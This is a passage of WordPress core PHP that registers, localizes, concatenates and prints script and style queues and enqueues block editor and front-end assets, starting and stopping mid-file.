$fonts_url = '';
/*
* translators: Use this to specify the proper Google Font name and variants
* to load that is supported by your language. Do not translate.
* Set to 'off' to disable loading.
*/
$font_family = _x( 'Noto Serif:400,400i,700,700i', 'Google Font Name and Variants' );
if ( 'off' !== $font_family ) {
$fonts_url = 'https://fonts.googleapis.com/css?family=' . urlencode( $font_family );
}
$styles->add( 'wp-editor-font', $fonts_url ); // No longer used in core as of 5.7.
$block_library_theme_path = WPINC . "/css/dist/block-library/theme$suffix.css";
$styles->add( 'wp-block-library-theme', "/$block_library_theme_path" );
$styles->add_data( 'wp-block-library-theme', 'path', ABSPATH . $block_library_theme_path );
$classic_theme_styles_path = WPINC . "/css/classic-themes$suffix.css";
$styles->add( 'classic-theme-styles', "/$classic_theme_styles_path" );
$styles->add_data( 'classic-theme-styles', 'path', ABSPATH . $classic_theme_styles_path );
$styles->add(
'wp-reset-editor-styles',
"/wp-includes/css/dist/block-library/reset$suffix.css",
array( 'common', 'forms' ) // Make sure the reset is loaded after the default WP Admin styles.
);
$styles->add(
'wp-editor-classic-layout-styles',
"/wp-includes/css/dist/edit-post/classic$suffix.css",
array()
);
$styles->add(
'wp-block-editor-content',
"/wp-includes/css/dist/block-editor/content$suffix.css",
array( 'wp-components' )
);
// Only add CONTENT styles here that should be enqueued in the iframe!
$wp_edit_blocks_dependencies = array(
'wp-components',
/*
* This needs to be added before the block library styles,
* The block library styles override the "reset" styles.
*/
'wp-reset-editor-styles',
'wp-block-library',
'wp-block-editor-content',
);
// Only load the default layout and margin styles for themes without theme.json file.
if ( ! wp_theme_has_theme_json() ) {
$wp_edit_blocks_dependencies[] = 'wp-editor-classic-layout-styles';
}
if (
current_theme_supports( 'wp-block-styles' ) &&
( ! is_array( $editor_styles ) || count( $editor_styles ) === 0 )
) {
/*
* Include opinionated block styles if the theme supports block styles and
* no $editor_styles are declared, so the editor never appears broken.
*/
$wp_edit_blocks_dependencies[] = 'wp-block-library-theme';
}
$styles->add(
'wp-edit-blocks',
"/wp-includes/css/dist/block-library/editor$suffix.css",
$wp_edit_blocks_dependencies
);
$package_styles = array(
'block-editor' => array( 'wp-components', 'wp-preferences' ),
'block-library' => array(),
'block-directory' => array(),
'components' => array(),
'commands' => array( 'wp-components' ),
'edit-post' => array(
'wp-components',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-commands',
'wp-preferences',
),
'editor' => array(
'wp-components',
'wp-block-editor',
'wp-reusable-blocks',
'wp-patterns',
'wp-preferences',
),
'format-library' => array(),
'list-reusable-blocks' => array( 'wp-components' ),
'reusable-blocks' => array( 'wp-components' ),
'patterns' => array( 'wp-components' ),
'preferences' => array( 'wp-components' ),
'nux' => array( 'wp-components' ),
'widgets' => array(
'wp-components',
),
'edit-widgets' => array(
'wp-widgets',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-patterns',
'wp-preferences',
),
'customize-widgets' => array(
'wp-widgets',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-block-library',
'wp-patterns',
'wp-preferences',
),
'edit-site' => array(
'wp-components',
'wp-block-editor',
'wp-editor',
'wp-edit-blocks',
'wp-commands',
'wp-preferences',
),
);
foreach ( $package_styles as $package => $dependencies ) {
$handle = 'wp-' . $package;
$path = "/wp-includes/css/dist/$package/style$suffix.css";
if ( 'block-library' === $package && wp_should_load_separate_core_block_assets() ) {
$path = "/wp-includes/css/dist/$package/common$suffix.css";
}
$styles->add( $handle, $path, $dependencies );
$styles->add_data( $handle, 'path', ABSPATH . $path );
}
// RTL CSS.
$rtl_styles = array(
// Admin CSS.
'common',
'forms',
'admin-menu',
'dashboard',
'list-tables',
'edit',
'revisions',
'media',
'themes',
'about',
'nav-menus',
'widgets',
'site-icon',
'l10n',
'install',
'wp-color-picker',
'customize-controls',
'customize-widgets',
'customize-nav-menus',
'customize-preview',
'login',
'site-health',
'wp-empty-template-alert',
// Includes CSS.
'buttons',
'admin-bar',
'wp-auth-check',
'editor-buttons',
'media-views',
'wp-pointer',
'wp-jquery-ui-dialog',
// Package styles.
'wp-reset-editor-styles',
'wp-editor-classic-layout-styles',
'wp-block-library-theme',
'wp-edit-blocks',
'wp-block-editor',
'wp-block-library',
'wp-block-directory',
'wp-commands',
'wp-components',
'wp-customize-widgets',
'wp-edit-post',
'wp-edit-site',
'wp-edit-widgets',
'wp-editor',
'wp-format-library',
'wp-list-reusable-blocks',
'wp-reusable-blocks',
'wp-patterns',
'wp-nux',
'wp-widgets',
// Deprecated CSS.
'deprecated-media',
'farbtastic',
);
foreach ( $rtl_styles as $rtl_style ) {
$styles->add_data( $rtl_style, 'rtl', 'replace' );
if ( $suffix ) {
$styles->add_data( $rtl_style, 'suffix', $suffix );
}
}
}
/**
* Reorders JavaScript scripts array to place prototype before jQuery.
*
* @since 2.3.1
*
* @param string[] $js_array JavaScript scripts array
* @return string[] Reordered array, if needed.
*/
function wp_prototype_before_jquery( $js_array ) {
$prototype = array_search( 'prototype', $js_array, true );
if ( false === $prototype ) {
return $js_array;
}
$jquery = array_search( 'jquery', $js_array, true );
if ( false === $jquery ) {
return $js_array;
}
if ( $prototype < $jquery ) {
return $js_array;
}
unset( $js_array[ $prototype ] );
array_splice( $js_array, $jquery, 0, 'prototype' );
return $js_array;
}
/**
* Loads localized data on print rather than initialization.
*
* These localizations require information that may not be loaded even by init.
*
* @since 2.5.0
*
* @global array $shortcode_tags
*/
function wp_just_in_time_script_localization() {
wp_localize_script(
'autosave',
'autosaveL10n',
array(
'autosaveInterval' => AUTOSAVE_INTERVAL,
'blog_id' => get_current_blog_id(),
)
);
wp_localize_script(
'mce-view',
'mceViewL10n',
array(
'shortcodes' => ! empty( $GLOBALS['shortcode_tags'] ) ? array_keys( $GLOBALS['shortcode_tags'] ) : array(),
)
);
wp_localize_script(
'word-count',
'wordCountL10n',
array(
'type' => wp_get_word_count_type(),
'shortcodes' => ! empty( $GLOBALS['shortcode_tags'] ) ? array_keys( $GLOBALS['shortcode_tags'] ) : array(),
)
);
}
/**
* Localizes the jQuery UI datepicker.
*
* @since 4.6.0
*
* @link https://api.jqueryui.com/datepicker/#options
*
* @global WP_Locale $wp_locale WordPress date and time locale object.
*/
function wp_localize_jquery_ui_datepicker() {
global $wp_locale;
if ( ! wp_script_is( 'jquery-ui-datepicker', 'enqueued' ) ) {
return;
}
// Convert the PHP date format into jQuery UI's format.
$datepicker_date_format = str_replace(
array(
'd',
'j',
'l',
'z', // Day.
'F',
'M',
'n',
'm', // Month.
'Y',
'y', // Year.
),
array(
'dd',
'd',
'DD',
'o',
'MM',
'M',
'm',
'mm',
'yy',
'y',
),
get_option( 'date_format' )
);
$datepicker_defaults = wp_json_encode(
array(
'closeText' => __( 'Close' ),
'currentText' => __( 'Today' ),
'monthNames' => array_values( $wp_locale->month ),
'monthNamesShort' => array_values( $wp_locale->month_abbrev ),
'nextText' => __( 'Next' ),
'prevText' => __( 'Previous' ),
'dayNames' => array_values( $wp_locale->weekday ),
'dayNamesShort' => array_values( $wp_locale->weekday_abbrev ),
'dayNamesMin' => array_values( $wp_locale->weekday_initial ),
'dateFormat' => $datepicker_date_format,
'firstDay' => absint( get_option( 'start_of_week' ) ),
'isRTL' => $wp_locale->is_rtl(),
),
JSON_HEX_TAG | JSON_UNESCAPED_SLASHES
);
wp_add_inline_script( 'jquery-ui-datepicker', "jQuery(function(jQuery){jQuery.datepicker.setDefaults({$datepicker_defaults});});" );
}
/**
* Localizes community events data that needs to be passed to dashboard.js.
*
* @since 4.8.0
*/
function wp_localize_community_events() {
if ( ! wp_script_is( 'dashboard' ) ) {
return;
}
require_once ABSPATH . 'wp-admin/includes/class-wp-community-events.php';
$user_id = get_current_user_id();
$saved_location = get_user_option( 'community-events-location', $user_id );
$saved_ip_address = isset( $saved_location['ip'] ) ? $saved_location['ip'] : false;
$current_ip_address = WP_Community_Events::get_unsafe_client_ip();
/*
* If the user's location is based on their IP address, then update their
* location when their IP address changes. This allows them to see events
* in their current city when travelling. Otherwise, they would always be
* shown events in the city where they were when they first loaded the
* Dashboard, which could have been months or years ago.
*/
if ( $saved_ip_address && $current_ip_address && $current_ip_address !== $saved_ip_address ) {
$saved_location['ip'] = $current_ip_address;
update_user_meta( $user_id, 'community-events-location', $saved_location );
}
$events_client = new WP_Community_Events( $user_id, $saved_location );
wp_localize_script(
'dashboard',
'communityEventsData',
array(
'nonce' => wp_create_nonce( 'community_events' ),
'cache' => $events_client->get_cached_events(),
'time_format' => get_option( 'time_format' ),
)
);
}
/**
* Administration Screen CSS for changing the styles.
*
* If installing the 'wp-admin/' directory will be replaced with './'.
*
* The $_wp_admin_css_colors global manages the Administration Screens CSS
* stylesheet that is loaded. The option that is set is 'admin_color' and is the
* color and key for the array. The value for the color key is an object with
* a 'url' parameter that has the URL path to the CSS file.
*
* The query from $src parameter will be appended to the URL that is given from
* the $_wp_admin_css_colors array value URL.
*
* @since 2.6.0
*
* @global array $_wp_admin_css_colors
*
* @param string $src Source URL.
* @param string $handle Either 'colors' or 'colors-rtl'.
* @return string|false URL path to CSS stylesheet for Administration Screens.
*/
function wp_style_loader_src( $src, $handle ) {
global $_wp_admin_css_colors;
if ( wp_installing() ) {
return preg_replace( '#^wp-admin/#', './', $src );
}
if ( 'colors' === $handle ) {
$color = get_user_option( 'admin_color' );
if ( empty( $color ) || ! isset( $_wp_admin_css_colors[ $color ] ) ) {
$color = 'fresh';
}
$color = $_wp_admin_css_colors[ $color ];
$url = $color->url;
if ( ! $url ) {
return false;
}
$parsed = parse_url( $src );
if ( isset( $parsed['query'] ) && $parsed['query'] ) {
wp_parse_str( $parsed['query'], $qv );
$url = add_query_arg( $qv, $url );
}
return $url;
}
return $src;
}
/**
* Prints the script queue in the HTML head on admin pages.
*
* Postpones the scripts that were queued for the footer.
* print_footer_scripts() is called in the footer to print these scripts.
*
* @since 2.8.0
*
* @see wp_print_scripts()
*
* @global bool $concatenate_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function print_head_scripts() {
global $concatenate_scripts;
if ( ! did_action( 'wp_print_scripts' ) ) {
/** This action is documented in wp-includes/functions.wp-scripts.php */
do_action( 'wp_print_scripts' );
}
$wp_scripts = wp_scripts();
script_concat_settings();
$wp_scripts->do_concat = $concatenate_scripts;
$wp_scripts->do_head_items();
/**
* Filters whether to print the head scripts.
*
* @since 2.8.0
*
* @param bool $print Whether to print the head scripts. Default true.
*/
if ( apply_filters( 'print_head_scripts', true ) ) {
_print_scripts();
}
$wp_scripts->reset();
return $wp_scripts->done;
}
/**
* Prints the scripts that were queued for the footer or too late for the HTML head.
*
* @since 2.8.0
*
* @global WP_Scripts $wp_scripts
* @global bool $concatenate_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function print_footer_scripts() {
global $wp_scripts, $concatenate_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
return array(); // No need to run if not instantiated.
}
script_concat_settings();
$wp_scripts->do_concat = $concatenate_scripts;
$wp_scripts->do_footer_items();
/**
* Filters whether to print the footer scripts.
*
* @since 2.8.0
*
* @param bool $print Whether to print the footer scripts. Default true.
*/
if ( apply_filters( 'print_footer_scripts', true ) ) {
_print_scripts();
}
$wp_scripts->reset();
return $wp_scripts->done;
}
/**
* Prints scripts (internal use only)
*
* @since 2.8.0
*
* @ignore
*
* @global WP_Scripts $wp_scripts
* @global bool $compress_scripts
*/
function _print_scripts() {
global $wp_scripts, $compress_scripts;
$zip = $compress_scripts ? 1 : 0;
if ( $zip && defined( 'ENFORCE_GZIP' ) && ENFORCE_GZIP ) {
$zip = 'gzip';
}
$concat = trim( $wp_scripts->concat, ', ' );
$type_attr = current_theme_supports( 'html5', 'script' ) ? '' : " type='text/javascript'";
if ( $concat ) {
if ( ! empty( $wp_scripts->print_code ) ) {
echo "\n<script{$type_attr}>\n";
echo "/* <![CDATA[ */\n"; // Not needed in HTML 5.
echo $wp_scripts->print_code;
echo sprintf( "\n//# sourceURL=%s\n", rawurlencode( 'js-inline-concat-' . $concat ) );
echo "/* ]]> */\n";
echo "</script>\n";
}
$concat = str_split( $concat, 128 );
$concatenated = '';
foreach ( $concat as $key => $chunk ) {
$concatenated .= "&load%5Bchunk_{$key}%5D={$chunk}";
}
$src = $wp_scripts->base_url . "/wp-admin/load-scripts.php?c={$zip}" . $concatenated . '&ver=' . $wp_scripts->default_version;
echo "<script{$type_attr} src='" . esc_attr( $src ) . "'></script>\n";
}
if ( ! empty( $wp_scripts->print_html ) ) {
echo $wp_scripts->print_html;
}
}
/**
* Prints the script queue in the HTML head on the front end.
*
* Postpones the scripts that were queued for the footer.
* wp_print_footer_scripts() is called in the footer to print these scripts.
*
* @since 2.8.0
*
* @global WP_Scripts $wp_scripts
*
* @return string[] Handles of the scripts that were printed.
*/
function wp_print_head_scripts() {
global $wp_scripts;
if ( ! did_action( 'wp_print_scripts' ) ) {
/** This action is documented in wp-includes/functions.wp-scripts.php */
do_action( 'wp_print_scripts' );
}
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
return array(); // No need to run if nothing is queued.
}
return print_head_scripts();
}
/**
* Private, for use in *_footer_scripts hooks
*
* In classic themes, when block styles are loaded on demand via wp_load_classic_theme_block_styles_on_demand(),
* this function is replaced by a closure in wp_hoist_late_printed_styles() which will capture the printing of
* two sets of "late" styles to be hoisted to the HEAD by means of the template enhancement output buffer:
*
* 1. Styles related to blocks are inserted right after the wp-block-library stylesheet.
* 2. All other styles are appended to the end of the HEAD.
*
* The closure calls print_footer_scripts() to print scripts in the footer as usual.
*
* @since 3.3.0
*/
function _wp_footer_scripts() {
print_late_styles();
print_footer_scripts();
}
/**
* Hooks to print the scripts and styles in the footer.
*
* @since 2.8.0
*/
function wp_print_footer_scripts() {
/**
* Fires when footer scripts are printed.
*
* @since 2.8.0
*/
do_action( 'wp_print_footer_scripts' );
}
/**
* Wrapper for do_action( 'wp_enqueue_scripts' ).
*
* Allows plugins to queue scripts for the front end using wp_enqueue_script().
* Runs first in wp_head() where all is_home(), is_page(), etc. functions are available.
*
* @since 2.8.0
*/
function wp_enqueue_scripts() {
/**
* Fires when scripts and styles are enqueued.
*
* @since 2.8.0
*/
do_action( 'wp_enqueue_scripts' );
}
/**
* Prints the styles queue in the HTML head on admin pages.
*
* @since 2.8.0
*
* @global bool $concatenate_scripts
*
* @return string[] Handles of the styles that were printed.
*/
function print_admin_styles() {
global $concatenate_scripts;
$wp_styles = wp_styles();
script_concat_settings();
$wp_styles->do_concat = $concatenate_scripts;
$wp_styles->do_items( false );
/**
* Filters whether to print the admin styles.
*
* @since 2.8.0
*
* @param bool $print Whether to print the admin styles. Default true.
*/
if ( apply_filters( 'print_admin_styles', true ) ) {
_print_styles();
}
$wp_styles->reset();
return $wp_styles->done;
}
/**
* Prints the styles that were queued too late for the HTML head.
*
* @since 3.3.0
*
* @global WP_Styles $wp_styles
* @global bool $concatenate_scripts
*
* @return array|void
*/
function print_late_styles() {
global $wp_styles, $concatenate_scripts;
if ( ! ( $wp_styles instanceof WP_Styles ) ) {
return;
}
script_concat_settings();
$wp_styles->do_concat = $concatenate_scripts;
$wp_styles->do_footer_items();
/**
* Filters whether to print the styles queued too late for the HTML head.
*
* @since 3.3.0
*
* @param bool $print Whether to print the 'late' styles. Default true.
*/
if ( apply_filters( 'print_late_styles', true ) ) {
_print_styles();
}
$wp_styles->reset();
return $wp_styles->done;
}
/**
* Prints styles (internal use only).
*
* @ignore
* @since 3.3.0
*
* @global bool $compress_css
*/
function _print_styles() {
global $compress_css;
$wp_styles = wp_styles();
$zip = $compress_css ? 1 : 0;
if ( $zip && defined( 'ENFORCE_GZIP' ) && ENFORCE_GZIP ) {
$zip = 'gzip';
}
$concat = trim( $wp_styles->concat, ', ' );
$type_attr = current_theme_supports( 'html5', 'style' ) ? '' : ' type="text/css"';
if ( $concat ) {
$dir = $wp_styles->text_direction;
$ver = $wp_styles->default_version;
$concat_source_url = 'css-inline-concat-' . $concat;
$concat = str_split( $concat, 128 );
$concatenated = '';
foreach ( $concat as $key => $chunk ) {
$concatenated .= "&load%5Bchunk_{$key}%5D={$chunk}";
}
$href = $wp_styles->base_url . "/wp-admin/load-styles.php?c={$zip}&dir={$dir}" . $concatenated . '&ver=' . $ver;
echo "<link rel='stylesheet' href='" . esc_attr( $href ) . "'{$type_attr} media='all' />\n";
if ( ! empty( $wp_styles->print_code ) ) {
echo "<style{$type_attr}>\n";
echo $wp_styles->print_code;
echo sprintf( "\n/*# sourceURL=%s */", rawurlencode( $concat_source_url ) );
echo "\n</style>\n";
}
}
if ( ! empty( $wp_styles->print_html ) ) {
echo $wp_styles->print_html;
}
}
/**
* Determines the concatenation and compression settings for scripts and styles.
*
* @since 2.8.0
*
* @global bool $concatenate_scripts
* @global bool $compress_scripts
* @global bool $compress_css
*/
function script_concat_settings() {
global $concatenate_scripts, $compress_scripts, $compress_css;
$compressed_output = ( ini_get( 'zlib.output_compression' ) || 'ob_gzhandler' === ini_get( 'output_handler' ) );
$can_compress_scripts = ! wp_installing() && get_site_option( 'can_compress_scripts' );
if ( ! isset( $concatenate_scripts ) ) {
$concatenate_scripts = defined( 'CONCATENATE_SCRIPTS' ) ? CONCATENATE_SCRIPTS : true;
if ( ( ! is_admin() && ! did_action( 'login_init' ) ) || ( defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG ) ) {
$concatenate_scripts = false;
}
}
if ( ! isset( $compress_scripts ) ) {
$compress_scripts = defined( 'COMPRESS_SCRIPTS' ) ? COMPRESS_SCRIPTS : true;
if ( $compress_scripts && ( ! $can_compress_scripts || $compressed_output ) ) {
$compress_scripts = false;
}
}
if ( ! isset( $compress_css ) ) {
$compress_css = defined( 'COMPRESS_CSS' ) ? COMPRESS_CSS : true;
if ( $compress_css && ( ! $can_compress_scripts || $compressed_output ) ) {
$compress_css = false;
}
}
}
/**
* Handles the enqueueing of block scripts and styles that are common to both
* the editor and the front-end.
*
* @since 5.0.0
*/
function wp_common_block_scripts_and_styles() {
if ( is_admin() && ! wp_should_load_block_editor_scripts_and_styles() ) {
return;
}
wp_enqueue_style( 'wp-block-library' );
if ( current_theme_supports( 'wp-block-styles' ) && ! wp_should_load_separate_core_block_assets() ) {
wp_enqueue_style( 'wp-block-library-theme' );
}
/**
* Fires after enqueuing block assets for both editor and front-end.
*
* Call `add_action` on any hook before 'wp_enqueue_scripts'.
*
* In the function call you supply, simply use `wp_enqueue_script` and
* `wp_enqueue_style` to add your functionality to the Gutenberg editor.
*
* @since 5.0.0
*/
do_action( 'enqueue_block_assets' );
}
/**
* Applies a filter to the list of style nodes that comes from WP_Theme_JSON::get_style_nodes().
*
* This particular filter removes all of the blocks from the array.
*
* We want WP_Theme_JSON to be ignorant of the implementation details of how the CSS is being used.
* This filter allows us to modify the output of WP_Theme_JSON depending on whether or not we are
* loading separate assets, without making the class aware of that detail.
*
* @since 6.1.0
*
* @param array $nodes The nodes to filter.
* @return array A filtered array of style nodes.
*/
function wp_filter_out_block_nodes( $nodes ) {
return array_filter(
$nodes,
static function ( $node ) {
return ! in_array( 'blocks', $node['path'], true );
},
ARRAY_FILTER_USE_BOTH
);
}
/**
* Enqueues the global styles defined via theme.json.
*
* @since 5.8.0
*/
function wp_enqueue_global_styles() {
$assets_on_demand = wp_should_load_block_assets_on_demand();
$is_block_theme = wp_is_block_theme();
$is_classic_theme = ! $is_block_theme;
/*
* Global styles should be printed in the head for block themes, or for classic themes when loading assets on
* demand is disabled, which is the default.
* The footer should only be used for classic themes when loading assets on demand is enabled.
*
* See https://core.trac.wordpress.org/ticket/53494 and https://core.trac.wordpress.org/ticket/61965.
*/
if (
( $is_block_theme && doing_action( 'wp_footer' ) ) ||
( $is_classic_theme && doing_action( 'wp_footer' ) && ! $assets_on_demand ) ||
( $is_classic_theme && doing_action( 'wp_enqueue_scripts' ) && $assets_on_demand )
) {
return;
}
/*
* If loading the CSS for each block separately, then load the theme.json CSS conditionally.
* This removes the CSS from the global-styles stylesheet and adds it to the inline CSS for each block.
* This filter must be registered before calling wp_get_global_stylesheet();
*/
add_filter( 'wp_theme_json_get_style_nodes', 'wp_filter_out_block_nodes' );
$stylesheet = wp_get_global_stylesheet();
if ( $is_block_theme ) {
/*
* Dequeue the Customizer's custom CSS
* and add it before the global styles custom CSS.
*/
remove_action( 'wp_head', 'wp_custom_css_cb', 101 );
/*
* Get the custom CSS from the Customizer and add it to the global stylesheet.
* Always do this in Customizer preview for the sake of live preview since it be empty.
*/
$custom_css = trim( wp_get_custom_css() );
if ( $custom_css || is_customize_preview() ) {
if ( is_customize_preview() ) {
/*
* When in the Customizer preview, wrap the Custom CSS in milestone comments to allow customize-preview.js
* to locate the CSS to replace for live previewing. Make sure that the milestone comments are omitted from
* the stored Custom CSS if by chance someone tried to add them, which would be highly unlikely, but it
* would break live previewing.
*/
$before_milestone = '/*BEGIN_CUSTOMIZER_CUSTOM_CSS*/';
$after_milestone = '/*END_CUSTOMIZER_CUSTOM_CSS*/';
$custom_css = str_replace( array( $before_milestone, $after_milestone ), '', $custom_css );
$custom_css = $before_milestone . "\n" . $custom_css . "\n" . $after_milestone;
}
$custom_css = "\n" . $custom_css;
}
$stylesheet .= $custom_css;
// Add the global styles custom CSS at the end.
$stylesheet .= wp_get_global_stylesheet( array( 'custom-css' ) );
}
if ( empty( $stylesheet ) ) {
return;
}
wp_register_style( 'global-styles', false );
wp_add_inline_style( 'global-styles', $stylesheet );
wp_enqueue_style( 'global-styles' );
// Add each block as an inline css.
wp_add_global_styles_for_blocks();
}
/**
* Checks if the editor scripts and styles for all registered block types
* should be enqueued on the current screen.
*
* @since 5.6.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @return bool Whether scripts and styles should be enqueued.
*/
function wp_should_load_block_editor_scripts_and_styles() {
global $current_screen;
$is_block_editor_screen = ( $current_screen instanceof WP_Screen ) && $current_screen->is_block_editor();
/**
* Filters the flag that decides whether or not block editor scripts and styles
* are going to be enqueued on the current screen.
*
* @since 5.6.0
*
* @param bool $is_block_editor_screen Current value of the flag.
*/
return apply_filters( 'should_load_block_editor_scripts_and_styles', $is_block_editor_screen );
}
/**
* Checks whether separate styles should be loaded for core blocks.
*
* When this function returns true, other functions ensure that core blocks use their own separate stylesheets.
* When this function returns false, all core blocks will use the single combined 'wp-block-library' stylesheet.
*
* As a side effect, the return value will by default result in block assets to be loaded on demand, via the
* {@see wp_should_load_block_assets_on_demand()} function. This behavior can be separately altered via that function.
*
* This only affects front end and not the block editor screens.
*
* @since 5.8.0
* @see @see wp_should_load_block_assets_on_demand()
* @see wp_enqueue_registered_block_scripts_and_styles()
* @see register_block_style_handle()
*
* @return bool Whether separate core block assets will be loaded.
*/
function wp_should_load_separate_core_block_assets() {
if ( is_admin() || is_feed() || wp_is_rest_endpoint() ) {
return false;
}
/**
* Filters whether block styles should be loaded separately.
*
* Returning false loads all core block assets, regardless of whether they are rendered
* in a page or not. Returning true loads core block assets only when they are rendered.
*
* @since 5.8.0
*
* @param bool $load_separate_assets Whether separate assets will be loaded.
* Default false (all block assets are loaded, even when not used).
*/
return apply_filters( 'should_load_separate_core_block_assets', false );
}
/**
* Checks whether block styles should be loaded only on-render.
*
* When this function returns true, other functions ensure that blocks only load their assets on-render.
* When this function returns false, all block assets are loaded regardless of whether they are rendered in a page.
*
* The default return value depends on the result of {@see wp_should_load_separate_core_block_assets()}, which controls
* whether Core block stylesheets should be loaded separately or via a combined 'wp-block-library' stylesheet.
*
* This only affects front end and not the block editor screens.
*
* @since 6.8.0
* @see wp_should_load_separate_core_block_assets()
*
* @return bool Whether to load block assets only when they are rendered.
*/
function wp_should_load_block_assets_on_demand() {
if ( is_admin() || is_feed() || wp_is_rest_endpoint() ) {
return false;
}
/*
* For backward compatibility, the default return value for this function is based on the return value of
* `wp_should_load_separate_core_block_assets()`. Initially, this function used to control both of these concerns.
*/
$load_assets_on_demand = wp_should_load_separate_core_block_assets();
/**
* Filters whether block styles should be loaded on demand.
*
* Returning false loads all block assets, regardless of whether they are rendered in a page or not.
* Returning true loads block assets only when they are rendered.
*
* The default value of the filter depends on the result of {@see wp_should_load_separate_core_block_assets()},
* which controls whether Core block stylesheets should be loaded separately or via a combined 'wp-block-library'
* stylesheet.
*
* @since 6.8.0
*
* @param bool $load_assets_on_demand Whether to load block assets only when they are rendered.
*/
return apply_filters( 'should_load_block_assets_on_demand', $load_assets_on_demand );
}
/**
* Enqueues registered block scripts and styles, depending on current rendered
* context (only enqueuing editor scripts while in context of the editor).
*
* @since 5.0.0
*/
function wp_enqueue_registered_block_scripts_and_styles() {
if ( wp_should_load_block_assets_on_demand() ) {
return;
}
$load_editor_scripts_and_styles = is_admin() && wp_should_load_block_editor_scripts_and_styles();
$block_registry = WP_Block_Type_Registry::get_instance();
/*
* Block styles are only enqueued if they're registered. For core blocks, this is only the case if
* `wp_should_load_separate_core_block_assets()` returns true. Otherwise they use the single combined
* 'wp-block-library` stylesheet. See also `register_core_block_style_handles()`.
* Since `wp_enqueue_style()` does not trigger warnings if the style is not registered, it is okay to not cater for
* this behavior here and simply call `wp_enqueue_style()` unconditionally.
*/
foreach ( $block_registry->get_all_registered() as $block_name => $block_type ) {
// Front-end and editor styles.
foreach ( $block_type->style_handles as $style_handle ) {
wp_enqueue_style( $style_handle );
}
// Front-end and editor scripts.
foreach ( $block_type->script_handles as $script_handle ) {
wp_enqueue_script( $script_handle );
}
if ( $load_editor_scripts_and_styles ) {
// Editor styles.
foreach ( $block_type->editor_style_handles as $editor_style_handle ) {
wp_enqueue_style( $editor_style_handle );
}
// Editor scripts.
foreach ( $block_type->editor_script_handles as $editor_script_handle ) {
wp_enqueue_script( $editor_script_handle );
}
}
}
}
/**
* Function responsible for enqueuing the styles required for block styles functionality on the editor and on the frontend.
*
* @since 5.3.0
*
* @global WP_Styles $wp_styles
*/
function enqueue_block_styles_assets() {
global $wp_styles;
$block_styles = WP_Block_Styles_Registry::get_instance()->get_all_registered();
foreach ( $block_styles as $block_name => $styles ) {
foreach ( $styles as $style_properties ) {
if ( isset( $style_properties['style_handle'] ) ) {
// If the site loads block styles on demand, enqueue the stylesheet on render.
if ( wp_should_load_block_assets_on_demand() ) {
add_filter(
'render_block',
static function ( $html, $block ) use ( $block_name, $style_properties ) {
if ( $block['blockName'] === $block_name ) {
wp_enqueue_style( $style_properties['style_handle'] );
}
return $html;
},
10,
2
);
} else {
wp_enqueue_style( $style_properties['style_handle'] );
}
}
if ( isset( $style_properties['inline_style'] ) ) {
// Default to "wp-block-library".
$handle = 'wp-block-library';
// If the site loads block styles on demand, check if the block has a stylesheet registered.
if ( wp_should_load_block_assets_on_demand() ) {
$block_stylesheet_handle = generate_block_asset_handle( $block_name, 'style' );
if ( isset( $wp_styles->registered[ $block_stylesheet_handle ] ) ) {
$handle = $block_stylesheet_handle;
}
}
// Add inline styles to the calculated handle.
wp_add_inline_style( $handle, $style_properties['inline_style'] );
}
}
}
}
/**
* Function responsible for enqueuing the assets required for block styles functionality on the editor.
*
* @since 5.3.0
*/
function enqueue_editor_block_styles_assets() {
$block_styles = WP_Block_Styles_Registry::get_instance()->get_all_registered();
$register_script_lines = array( '( function() {' );
foreach ( $block_styles as $block_name => $styles ) {
foreach ( $styles as $style_properties ) {
$block_style = array(
'name' => $style_properties['name'],
'label' => $style_properties['label'],
);
if ( isset( $style_properties['is_default'] ) ) {
$block_style['isDefault'] = $style_properties['is_default'];
}
$register_script_lines[] = sprintf(
' wp.blocks.registerBlockStyle( \'%s\', %s );',
$block_name,
wp_json_encode( $block_style, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
);
}
}
$register_script_lines[] = '} )();';
$inline_script = implode( "\n", $register_script_lines );
wp_register_script( 'wp-block-styles', false, array( 'wp-blocks' ), true, array( 'in_footer' => true ) );
wp_add_inline_script( 'wp-block-styles', $inline_script );
wp_enqueue_script( 'wp-block-styles' );
}
/**
* Enqueues the assets required for the block directory within the block editor.
*
* @since 5.5.0
*/
function wp_enqueue_editor_block_directory_assets() {
wp_enqueue_script( 'wp-block-directory' );
wp_enqueue_style( 'wp-block-directory' );
}
/**
* Enqueues the assets required for the format library within the block editor.
*
* @since 5.8.0
*/
function wp_enqueue_editor_format_library_assets() {
wp_enqueue_script( 'wp-format-library' );
wp_enqueue_style( 'wp-format-library' );
}
/**
* Sanitizes an attributes array into an attributes string to be placed inside a `<script>` tag.
*
* Automatically injects type attribute if needed.
* Used by {@see wp_get_script_tag()} and {@see wp_get_inline_script_tag()}.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* @return string String made of sanitized `<script>` tag attributes.
*/
function wp_sanitize_script_attributes( $attributes ) {
$html5_script_support = is_admin() || current_theme_supports( 'html5', 'script' );
$attributes_string = '';
/*
* If HTML5 script tag is supported, only the attribute name is added
* to $attributes_string for entries with a boolean value, and that are true.
*/
foreach ( $attributes as $attribute_name => $attribute_value ) {
if ( is_bool( $attribute_value ) ) {
if ( $attribute_value ) {
$attributes_string .= $html5_script_support ? ' ' . esc_attr( $attribute_name ) : sprintf( ' %1$s="%2$s"', esc_attr( $attribute_name ), esc_attr( $attribute_name ) );
}
} else {
$attributes_string .= sprintf( ' %1$s="%2$s"', esc_attr( $attribute_name ), esc_attr( $attribute_value ) );
}
}
return $attributes_string;
}
/**
* Formats `<script>` loader tags.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* @return string String containing `<script>` opening and closing tags.
*/
function wp_get_script_tag( $attributes ) {
